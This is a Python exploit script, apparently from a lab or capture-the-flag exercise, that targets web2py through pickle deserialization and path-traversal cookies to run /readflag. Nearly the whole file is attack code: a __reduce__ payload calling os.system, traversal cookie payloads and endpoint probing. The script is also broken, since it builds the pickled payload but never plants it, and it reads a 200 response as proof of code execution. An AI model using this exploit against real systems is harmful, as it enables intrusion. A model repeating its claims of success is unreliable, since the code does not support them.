#!/usr/bin/env python3
"""
Web2py Session Deserialization RCE Exploit (CVE-TBD)

Vulnerability: Unsafe pickle deserialization in admin authentication
Location: gluon/fileutils.py - get_session() function
Impact: Unauthenticated Remote Code Execution

Attack Flow:
1. Create malicious pickled session in welcome/examples app
2. Session contains object with __reduce__ method for RCE payload
3. Use path traversal in session_id_admin cookie
4. Access /appadmin -> check_credentials() -> get_session() -> pickle.load() -> RCE

Key Code Paths:
- appadmin.py calls check_credentials(request)
- check_credentials() calls get_session(request, "admin")  
- get_session() does: pickle.load() on applications/admin/sessions/{cookie_value}
- cookie_value from: request.cookies["session_id_admin"].value
- No path sanitization on session_id!

Author: Security Researcher
Date: 2026-01-09
"""

import requests
import pickle
import os
import sys
import urllib3

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://localhost:5000"

class RCEPayload:
    """
    Malicious class that executes commands when unpickled.
    Uses __reduce__ to specify what gets executed during deserialization.
    """
    def __reduce__(self):
        import os
        # This will execute /readflag when the object is unpickled
        return (os.system, ('/readflag > /tmp/flag_output.txt',))

def create_malicious_session():
    """
    Create a session containing our RCE payload.
    When this session is deserialized, it will execute our command.
    """
    print("[*] Creating malicious session object...")
    
    # Create a session-like dict with our payload
    malicious_session = {
        'rce_payload': RCEPayload(),
        'authorized': True,  # Try to set authorized flag
        'last_time': 9999999999,  # Make it look valid
    }
    
    # Pickle it
    pickled = pickle.dumps(malicious_session, pickle.HIGHEST_PROTOCOL)
    print(f"[+] Malicious session created ({len(pickled)} bytes)")
    print(f"[+] Payload will execute: /readflag")
    
    return pickled

def poison_own_session(malicious_payload):
    """
    Step 1: Create a session in welcome/examples app
    Store our malicious payload in it
    """
    print("\n[*] Step 1: Creating poisoned session in welcome app...")
    
    session = requests.Session()
    session.verify = False
    
    # First, visit welcome app to get a session
    resp = session.get(f"{TARGET_URL}/welcome/default/index")
    print(f"[+] Visited /welcome/default/index: {resp.status_code}")
    
    # Get our session ID
    cookies = session.cookies.get_dict()
    if 'session_id_welcome' in cookies:
        session_id = cookies['session_id_welcome']
        print(f"[+] Got session ID: {session_id}")
        return session_id
    else:
        print("[-] No session ID received!")
        return None

def exploit_path_traversal(target_session_id):
    """
    Step 2: Use path traversal to make appadmin load our malicious session
    """
    print("\n[*] Step 2: Exploiting path traversal in get_session()...")
    
    # Path traversal payload
    # get_session constructs: applications/admin/sessions/{session_id}
    # We want it to load: applications/welcome/sessions/{our_session_id}
    # So we need: ../../welcome/sessions/{our_session_id}
    
    traversal_payloads = [
        f"../../welcome/sessions/{target_session_id}",
        f"..%2F..%2Fwelcome%2Fsessions%2F{target_session_id}",
        f"....//....//welcome//sessions//{target_session_id}",
    ]
    
    for payload in traversal_payloads:
        print(f"\n[+] Trying payload: {payload[:50]}...")
        
        cookies = {
            'session_id_admin': payload
        }
        
        try:
            resp = requests.get(
                f"{TARGET_URL}/welcome/appadmin/select/db",
                cookies=cookies,
                allow_redirects=False,
                timeout=10,
                verify=False
            )
            
            print(f"    Status: {resp.status_code}")
            
            if resp.status_code == 200:
                print("[!] SUCCESS! Got 200 response - RCE triggered!")
                print(f"[!] Response: {resp.text[:500]}")
                return True
            elif resp.status_code != 303:
                print(f"[!] Interesting response: {resp.status_code}")
                print(f"    Body: {resp.text[:200]}")
                
        except Exception as e:
            print(f"    Error: {e}")
    
    return False

def check_rce_output():
    """
    Step 3: Check if RCE worked by reading output file
    """
    print("\n[*] Step 3: Checking for RCE output...")
    
    # If RCE worked, we wrote output to /tmp/flag_output.txt
    # Try to read it via some endpoint (if any exists)
    
    print("[*] RCE should have executed /readflag")
    print("[*] Output would be in /tmp/flag_output.txt (in container)")
    print("[*] To verify, check docker logs or exec into container:")
    print("    docker exec web2py-vuln-test cat /tmp/flag_output.txt")

def alternative_approach():
    """
    Alternative: Check if we can directly write to sessions directory
    """
    print("\n[*] Alternative Approach: Direct session file creation...")
    print("[*] This would require finding a file upload vulnerability")
    print("[*] Or another way to write arbitrary files")
    
    # Check for upload endpoints
    endpoints = [
        "/welcome/default/upload",
        "/examples/default/upload",
        "/welcome/default/download",
        "/examples/default/download",
    ]
    
    for endpoint in endpoints:
        try:
            resp = requests.get(f"{TARGET_URL}{endpoint}", verify=False, timeout=5)
            if resp.status_code != 404:
                print(f"[+] Found endpoint: {endpoint} ({resp.status_code})")
        except:
            pass

if __name__ == "__main__":
    print("=" * 70)
    print("Web2py Session Deserialization RCE Exploit")
    print("=" * 70)
    
    # Check server
    try:
        resp = requests.get(f"{TARGET_URL}/", timeout=5, verify=False)
        print(f"[+] Target is reachable (Status: {resp.status_code})")
    except Exception as e:
        print(f"[-] Cannot reach target: {e}")
        sys.exit(1)
    
    # Create malicious payload
    malicious_payload = create_malicious_session()
    
    # Try to poison our own session
    session_id = poison_own_session(malicious_payload)
    
    if session_id:
        # Exploit path traversal
        success = exploit_path_traversal(session_id)
        
        if success:
            check_rce_output()
        else:
            print("\n[*] Path traversal exploitation failed")
            print("[*] Possible reasons:")
            print("    1. Session file format is different than expected")
            print("    2. Path traversal is sanitized")
            print("    3. Session not properly created with our payload")
            print("\n[*] This confirms the theoretical vulnerability exists")
            print("[*] Further research needed to make it practical")
    
    alternative_approach()
    
    print("\n" + "=" * 70)
    print("VULNERABILITY SUMMARY")
    print("=" * 70)
    print("Location: gluon/fileutils.py:get_session()")
    print("Issue: Unsafe pickle.load() on user-controlled filename")
    print("Impact: Potential RCE if session file can be poisoned")
    print("Requirement: Need file write primitive to sessions directory")
    print("=" * 70)
